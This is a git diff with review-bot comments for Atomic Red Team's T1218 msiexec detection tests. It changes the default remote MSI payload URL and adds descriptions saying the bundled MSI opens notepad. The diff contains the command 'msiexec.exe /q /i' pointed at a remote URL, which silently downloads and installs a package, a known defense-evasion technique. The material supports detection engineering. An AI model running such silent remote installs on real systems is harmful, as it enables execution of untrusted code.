diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index d02a270f..ddaac82b 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -161,7 +161,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 ## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation.
+Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
 **Supported Platforms:** Windows
@@ -202,7 +202,7 @@ Write-Host "You must provide your own MSI"
 ## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
 **Supported Platforms:** Windows
@@ -212,7 +212,7 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | http://site.com/file.msi|
+| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi|
 #### Attack Commands: Run with `command_prompt`!
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 49d752bb..596fb2e0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -12089,6 +12089,7 @@ defense-evasion:
 '
 - name: Msiexec.exe - Execute Local MSI file
 description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+ The MSI opens notepad.exe when sucessfully executed.
 '
 supported_platforms:
@@ -12110,7 +12111,8 @@ defense-evasion:
 '
 - name: Msiexec.exe - Execute Remote MSI file
 description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
- in application installation, commonly seen in malware execution.
+ in application installation, commonly seen in malware execution. The MSI opens
+ notepad.exe when sucessfully executed.
 '
 supported_platforms:
@@ -12119,7 +12121,7 @@ defense-evasion:
 msi_payload:
 description: MSI file to execute
 type: String
- default: http://site.com/file.msi
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
 executor:
 name: command_prompt
 command: 'msiexec.exe /q /i "#{msi_payload}"
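Review bot: The sentence added to the Local MSI description at @@ -12089 states the outcome unconditionally, but the T1218.md hunk header just before Test #5 shows a prerequisite message `You must provide your own MSI` that appears to belong to this test, so the claim presumably holds only for the repository's bundled T1218.msi. I would scope it and fix the spelling, e.g. `The bundled T1218.msi opens notepad.exe when successfully executed.`, so an operator validating detections knows which child process to expect and when not to expect it. The same wording, including the `sucessfully` typo, recurs in the Remote MSI description at @@ -12110 and in the `execution:` hunks at @@ -24307 and @@ -24328.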
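Review bot: The new `default:` for `msi_payload` at @@ -12119 points at the mutable `master` ref, and the executor line below it installs that URL with `msiexec.exe /q /i`, so each run silently installs whatever file is at that path at that moment, with no integrity check visible in this hunk. Pinning the default to a commit, e.g. `default: https://github.com/redcanaryco/atomic-red-team/raw/<COMMIT_SHA>/atomics/T1218/src/Win32/T1218.msi`, and recording the expected SHA-256 of T1218.msi in the description would keep the test reproducible and let operators verify the payload before running it. The same default is repeated in the `execution:` hunk at @@ -24337 and in the T1218.md inputs table at @@ -212; if index.yaml is generated from a per-technique file, the change belongs in that source. The executor entry continues past the end of the hunk.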
@@ -24307,6 +24309,7 @@ execution:
 '
 - name: Msiexec.exe - Execute Local MSI file
 description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+ The MSI opens notepad.exe when sucessfully executed.
 '
 supported_platforms:
@@ -24328,7 +24331,8 @@ execution:
 '
 - name: Msiexec.exe - Execute Remote MSI file
 description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
- in application installation, commonly seen in malware execution.
+ in application installation, commonly seen in malware execution. The MSI opens
+ notepad.exe when sucessfully executed.
 '
 supported_platforms:
@@ -24337,7 +24341,7 @@ execution:
 msi_payload:
 description: MSI file to execute
 type: String
- default: http://site.com/file.msi
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
 executor:
 name: command_prompt
 command: 'msiexec.exe /q /i "#{msi_payload}"